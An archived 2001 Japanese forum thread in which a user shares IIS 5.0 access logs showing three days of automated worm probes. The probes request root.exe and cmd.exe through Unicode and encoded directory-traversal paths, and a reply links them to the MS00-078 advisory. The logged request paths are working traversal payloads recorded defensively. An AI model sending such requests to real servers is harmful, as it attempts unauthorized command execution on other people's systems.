| どるこむ仲間の掲示板! 過去ログ倉庫 | LOG:2001/10: | |
|
●2001年10月インデックス
●過去ログ検索トップ
■どるこむ仲間の掲示板へ
| ||
| [4130] まだ、こんなのに付き合っている人がいるようです。 (2 レス) 2001/10/26(Fri) 22:30:06 |
No.MS さん |
| Web: (none) | |
|
無頓着な人が多いようです。ダイアルアップ接続のユーザに対して3日連続でアタックがありました。常時接続だったら、もっとすごいことになっているんだろうなあ。 #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2001-10-23 21:28:34 #Fields: time c-ip cs-method cs-uri-stem sc-status 21:28:34 202.5.195.10 GET /scripts/root.exe 404 21:28:41 202.5.195.10 GET /MSADC/root.exe 404 21:28:48 202.5.195.10 GET /c/winnt/system32/cmd.exe 404 21:28:54 202.5.195.10 GET /d/winnt/system32/cmd.exe 404 21:29:01 202.5.195.10 GET /scripts/..%5c../winnt/system32/cmd.exe 500 #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2001-10-24 22:09:13 #Fields: time c-ip cs-method cs-uri-stem sc-status 22:09:13 202.189.6.128 GET /scripts/root.exe 404 22:09:15 202.189.6.128 GET /MSADC/root.exe 404 22:09:16 202.189.6.128 GET /c/winnt/system32/cmd.exe 404 22:09:17 202.189.6.128 GET /d/winnt/system32/cmd.exe 404 22:09:19 202.189.6.128 GET /scripts/..%5c../winnt/system32/cmd.exe 500 22:09:19 202.189.6.128 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500 22:09:20 202.189.6.128 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 22:09:21 202.189.6.128 GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe 500 22:09:21 202.189.6.128 GET /scripts/..チ ../winnt/system32/cmd.exe 500 22:09:22 202.189.6.128 GET /scripts/winnt/system32/cmd.exe 404 22:09:24 202.189.6.128 GET /winnt/system32/cmd.exe 404 22:09:25 202.189.6.128 GET /winnt/system32/cmd.exe 404 22:09:27 202.189.6.128 GET /scripts/..%5c../winnt/system32/cmd.exe 500 22:09:27 202.189.6.128 GET /scripts/..%5c../winnt/system32/cmd.exe 500 22:09:28 202.189.6.128 GET /scripts/..%5c../winnt/system32/cmd.exe 500 22:09:28 202.189.6.128 GET /scripts/..%2f../winnt/system32/cmd.exe 500 #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 2001-10-25 21:44:46 #Fields: time c-ip cs-method cs-uri-stem sc-status 21:44:46 202.197.224.12 GET /scripts/root.exe 404 21:51:50 202.197.224.12 GET /scripts/root.exe 404 21:51:59 202.197.224.12 GET /MSADC/root.exe 404 21:52:05 202.197.224.12 GET /c/winnt/system32/cmd.exe 404 21:52:07 202.197.224.12 GET /d/winnt/system32/cmd.exe 404 21:52:10 202.197.224.12 GET /scripts/..%5c../winnt/system32/cmd.exe 500 21:52:15 202.197.224.12 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500 21:52:17 202.197.224.12 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 21:52:23 202.197.224.12 GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe 500 21:52:28 202.197.224.12 GET /scripts/..チ ../winnt/system32/cmd.exe 500 21:52:30 202.197.224.12 GET /scripts/winnt/system32/cmd.exe 404 21:52:32 202.197.224.12 GET /winnt/system32/cmd.exe 404 21:52:56 202.197.224.12 GET /winnt/system32/cmd.exe 404 21:53:01 202.197.224.12 GET /scripts/..%5c../winnt/system32/cmd.exe 500 21:53:06 202.197.224.12 GET /scripts/..%5c../winnt/system32/cmd.exe 500 21:53:08 202.197.224.12 GET /scripts/..%5c../winnt/system32/cmd.exe 500 21:53:13 202.197.224.12 GET /scripts/..%2f../winnt/system32/cmd.exe 500 %2fとか%5cとかのそれは
http://www.st.rim.or.jp/~shio/w2kworld/iisunicode/ http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078 の件ですよねえ。 常時接続ですが、CATVプロバイダの入り口でポート80を塞いでくれてからというもの、この手のアタックは受けておりませぬ。
もっとも闇サーバを立てるときは、ポート80以外でということなんでしょうが。 |
|